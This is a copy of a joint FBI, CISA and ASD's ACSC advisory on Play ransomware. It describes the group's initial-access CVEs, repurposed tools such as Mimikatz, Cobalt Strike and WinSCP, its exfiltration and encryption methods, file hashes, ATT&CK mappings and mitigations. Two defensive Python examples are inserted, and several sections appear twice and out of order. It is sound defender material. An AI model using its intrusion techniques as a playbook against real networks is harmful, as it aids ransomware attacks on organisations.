Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Organizations are advised to deploy the latest Microsoft Exchange security updates. If unable to patch, then disable Outlook Web Access (OWA) until updates are able to be undertaken. Also see Patching Applications and Operating Systems | Cyber.gov.au.
Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Also see Implementing Network Segmentation and Segregation.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 1.E]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents actors from directly connecting to remote access services they have established for persistence. Also see Inbound Traffic Filtering – Technique D3-ITF.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
Disable unused ports [CPG 2.V].
Consider adding an email banner to emails [CPG 2.M] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privileged escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E].
Maintain offline backups of data, and regularly test backup and restoration [CPG 2.R]. By instituting this practice, an organization ensures it will not be severely interrupted and will not be left with irretrievable data.
Ensure backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Tables 3-11).
Align your security technologies against this technique.
Test your technologies against this technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, the FBI’s Internet Crime Complaint Center (IC3), or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Symantec: Play Ransomware Group Using New Custom Data-Gathering Tools
[2] TrendMicro: Play Ransomware Spotlight
[3] SentinelLabs: Ransomware Developers Turn to Intermittent Encryption to Evade Detection
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.
Download a PDF version of this report:
AA23-352A #StopRansomware: Play Ransomware
(PDF, 536.19 KB
)
For a downloadable copy of IOCs, see:
AA23-352A STIX XML
(XML, 34.87 KB
)
AA23-352A STIX JSON
(JSON, 30.22 KB
)
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Initial Access
The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [T1133] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
Discovery and Defense Evasion
Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [T1562.001] and remove log files [T1070.001]. In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2]
Lateral Movement and Execution
Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [T1552] and use the Mimikatz credential dumper to gain domain administrator access [T1003]. According to open source reporting [2], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [T1059] to search for additional privilege escalation paths. Actors then distribute executables [T1570] via Group Policy Objects [T1484.001].
Exfiltration and Encryption
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [T1560.001] into .RAR format for exfiltration. The actors then use WinSCP to transfer data [T1048] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [T1486] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes. [3] (Note: System files are skipped during the encryption process.) A .play extension is added to file names and a ransom note titled ReadMe[.]txt is placed in file directory C:.
Impact
The Play ransomware group uses a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in @gmx[.]de. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network ([.]onion URL).
Leveraged Tools
Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
Table 1: Tools Leveraged by Play Ransomware Actors
Name
Description
AdFind
Used to query and retrieve information from Active Directory.
Bloodhound
Used to query and retrieve information from Active Directory.
GMER
A software tool intended to be used for detecting and removing rootkits.
IOBit
An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software.
PsExec
A tool designed to run programs and execute commands on remote systems.
PowerTool
A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things.
PowerShell
A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
Cobalt Strike
A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution.
Mimikatz
Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers.
WinPEAS
Used to search for additional privilege escalation paths.
WinRAR
Used to split compromised data into segments and to compress files into .RAR format for exfiltration.
WinSCP
Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.
Microsoft Nltest
Used by Play ransomware actors for network discovery.
Nekto / PriviCMD
Used by Play ransomware actors for privilege escalation.
Process Hacker
Used to enumerate running processes on a system.
Plink
Used to establish persistent SSH tunnels.
Indicators of Compromise
See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.
Table 2: Hashes Associated with Play Ransomware Actors
Hashes (SHA256)
Description
453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb
Play ransomware custom data gathering tool
47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57
Play ransomware encryptor
75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212
SystemBC malware EXE
7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986
SystemBC malware DLL
7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8
Play ransomware binary
7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca
SystemBC malware DLL
c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c
Play network scanner
e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74
Play ransomware binary
e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da
Play ransomware binary
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.
Table 3: Play ATT&CK Techniques for Enterprise for Initial Access
Technique Title
ID
Use
Valid Accounts
T1078
Play ransomware actors obtain and abuse existing account credentials to gain initial access.
Exploit Public Facing Application
T1190
Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks.
External Remote Services
T1133
Play ransomware actors have used remote access services, such as RDP/VPN connection to gain initial access.
Table 4: Play ATT&CK Techniques for Enterprise for Discovery
Technique Title
ID
Use
System Network Configuration Discovery
T1016
Play ransomware actors use tools like Grixba to identify network configurations and settings.
Software Discovery: Security Software Discovery
T1518.001
Play ransomware actors scan for anti-virus software.
Table 5: Play ATT&CK Techniques for Enterprise for Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software.
Indicator Removal: Clear Windows Event Logs
T1070.001
Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity.
Table 6: Play ATT&CK Techniques for Enterprise for Credential Access
Technique Title
ID
Use
Unsecured Credentials
T1552
Play ransomware actors attempt to identify and exploit credentials stored unsecurely on a compromised network.
OS Credential Dumping
T1003
Play ransomware actors use tools like Mimikatz to dump credentials.
Table 7: Play ATT&CK Techniques for Enterprise for Lateral Movement
Technique Title
ID
Use
Lateral Tool Transfer
T1570
Play ransomware actors distribute executables within the compromised environment.
Table 8: Play ATT&CK Techniques for Enterprise for Command and Control
Technique Title
ID
Use
Domain Policy Modification: Group Policy Modification
T1484.001
Play ransomware actors distribute executables via Group Policy Objects.
Table 9: Play ATT&CK Techniques for Enterprise for Collection
Technique Title
ID
Use
Archive Collected Data: Archive via Utility
T1560.001
Play ransomware actors use tools like WinRAR to compress files.
Table 10: Play ATT&CK Techniques for Enterprise for Exfiltration
Technique Title
ID
Use
Exfiltration Over Alternative Protocol
T1048
Play ransomware actors use file transfer tools like WinSCP to transfer data.
Table 11: Play ATT&CK Techniques for Enterprise for Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources.
Financial Theft
T1657
Play ransomware actors use a double-extortion model for financial gain.
MITIGATIONS
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 2.F, 2.R, 2.S] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies [CPG 2.C].
Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 2.B];
Store passwords in hashed format using industry-recognized password managers;
Add password user “salts” to shared login credentials;
Avoid reusing passwords;
Implement multiple failed login attempt account lockouts [CPG 2.G];
Disable password “hints”;
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
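The password items above describe checks that are easy to get subtly wrong (unsalted storage, reuse checks done on plaintext, lockouts that never expire). The following is an added example, not code from the advisory; it shows a policy validator for the 8 to 64 character range, per-password random salts with PBKDF2-HMAC-SHA256 from the standard library (the iteration count is an assumed parameter, not a value from the page), a reuse check performed against stored hashes rather than plaintext, and a time-bounded failed-login lockout.

```python
import hashlib
import hmac
import os
from datetime import datetime, timedelta

MIN_LEN, MAX_LEN = 8, 64                 # length range from the mitigation text
PBKDF2_ITERATIONS = 600_000              # assumed work factor; tune to your hardware
LOCKOUT_THRESHOLD = 5                    # assumed: failures inside the window before lockout
LOCKOUT_DURATION = timedelta(minutes=15) # assumed lockout window


def hash_password(password, salt=None):
    """Return 'saltHex$digestHex'; a fresh 16-byte salt is drawn per password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + '$' + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split('$', 1)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), bytes.fromhex(salt_hex),
                                 PBKDF2_ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def check_password_policy(password, previous_hashes=()):
    """Return a list of violations; an empty list means the password is compliant."""
    problems = []
    if len(password) < MIN_LEN:
        problems.append(f'shorter than {MIN_LEN} characters')
    if len(password) > MAX_LEN:
        problems.append(f'longer than {MAX_LEN} characters')
    # Reuse check against stored hashes only; plaintext history is never kept.
    if any(verify_password(password, h) for h in previous_hashes):
        problems.append('reuses a previous password')
    return problems


class LockoutTracker:
    """Locks an account after `threshold` failures inside `duration`; lock expires itself."""

    def __init__(self, threshold=LOCKOUT_THRESHOLD, duration=LOCKOUT_DURATION):
        self.threshold = threshold
        self.duration = duration
        self.failures = {}      # account -> recent failure timestamps
        self.locked_until = {}  # account -> datetime the lock expires

    def is_locked(self, account, now):
        until = self.locked_until.get(account)
        return until is not None and now < until

    def record_failure(self, account, now):
        recent = [t for t in self.failures.get(account, []) if now - t <= self.duration]
        recent.append(now)
        self.failures[account] = recent
        if len(recent) >= self.threshold:
            self.locked_until[account] = now + self.duration
            return True
        return False

    def record_success(self, account):
        self.failures.pop(account, None)
        self.locked_until.pop(account, None)


def attempt_login(store, tracker, account, password, now):
    """Return 'locked', 'ok' or 'denied'; store maps account -> stored hash."""
    if tracker.is_locked(account, now):
        return 'locked'
    stored = store.get(account)
    if stored is not None and verify_password(password, stored):
        tracker.record_success(account)
        return 'ok'
    tracker.record_failure(account, now)
    return 'denied'


if __name__ == '__main__':
    h = hash_password('correct horse battery staple')
    print(check_password_policy('short'), check_password_policy('correct horse battery staple', [h]))
```

Because the lock is checked before the hash is verified, a correct password presented during the lockout window is still refused, which is the behaviour that stops online guessing; the lock then clears on its own once the window passes, so a brief burst of typos does not require a help-desk reset.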
Require administrator credentials to install software.
Require multifactor authentication [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. Also see Protect Yourself: Multi-Factor Authentication | Cyber.gov.au.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Organizations are advised to deploy the latest Microsoft Exchange security updates. If unable to patch, then disable Outlook Web Access (OWA) until updates are able to be undertaken. Also see Patching Applications and Operating Systems | Cyber.gov.au.
Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Also see Implementing Network Segmentation and Segregation.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 1.E]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents actors from directly connecting to remote access services they have established for persistence. Also see Inbound Traffic Filtering – Technique D3-ITF.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and Active Directory for new and/or unrecognized accounts [CPG 1.A, 2.O].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
Disable unused ports [CPG 2.V].
Consider adding an email banner to emails [CPG 2.M] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
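The just-in-time model above reduces to a simple rule: an admin account is enabled only while an approved, unexpired grant for it exists, and a periodic reconciliation loop disables everything else. The following is an added example, not code from the advisory or from any identity product; the grant ceiling, account names and system names are assumed placeholders, and the reconcile step returns the enable/disable sets that a real deployment would apply to Active Directory.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

MAX_GRANT_DURATION = timedelta(hours=4)   # assumed ceiling; set per your policy


@dataclass
class Grant:
    account: str
    system: str
    reason: str
    start: datetime
    end: datetime
    approved: bool = False


class JitAccessPolicy:
    """Managed admin accounts are disabled unless an approved, unexpired grant exists."""

    def __init__(self, admin_accounts, max_duration=MAX_GRANT_DURATION):
        self.admin_accounts = set(admin_accounts)
        self.max_duration = max_duration
        self.grants: List[Grant] = []

    def request(self, account, system, reason, start, duration):
        """Record a request for a bounded window; approval is a separate step."""
        if account not in self.admin_accounts:
            raise ValueError(f'{account} is not a managed admin account')
        if duration <= timedelta(0) or duration > self.max_duration:
            raise ValueError(f'duration must be positive and at most {self.max_duration}')
        grant = Grant(account, system, reason, start, start + duration)
        self.grants.append(grant)
        return grant

    def approve(self, grant):
        grant.approved = True

    def active_grants(self, now):
        return [g for g in self.grants if g.approved and g.start <= now < g.end]

    def desired_state(self, now) -> Dict[str, bool]:
        """True for accounts that should be enabled right now, False for all others."""
        active = {g.account for g in self.active_grants(now)}
        return {acct: acct in active for acct in self.admin_accounts}

    def reconcile(self, currently_enabled: Set[str], now) -> Tuple[Set[str], Set[str]]:
        """Compare directory state with policy; returns (accounts to enable, accounts to disable)."""
        desired = self.desired_state(now)
        to_enable = {a for a, on in desired.items() if on and a not in currently_enabled}
        to_disable = {a for a, on in desired.items() if not on and a in currently_enabled}
        return to_enable, to_disable


if __name__ == '__main__':
    policy = JitAccessPolicy(['adm-jdoe', 'adm-asmith'])
    t0 = datetime(2023, 12, 1, 9, 0)
    g = policy.request('adm-jdoe', 'SRV-DB01', 'patch window', t0, timedelta(hours=2))
    policy.approve(g)
    print(policy.reconcile({'adm-jdoe', 'adm-asmith'}, t0 + timedelta(minutes=30)))
```

Running reconcile on a schedule (rather than only when a request is approved) is what makes the control fail closed: an account that was enabled out of band, or whose grant expired while the scheduler was down, is disabled on the next pass without anyone having to notice.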
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E].
Maintain offline backups of data, and regularly maintain backup and restoration procedures [CPG 2.R]. By instituting this practice, an organization ensures it will not be severely interrupted by an incident and will not be left with only irretrievable data.
Ensure backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Tables 3-11).
Align your security technologies against this technique.
Test your technologies against this technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, the FBI’s Internet Crime Complaint Center (IC3), or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.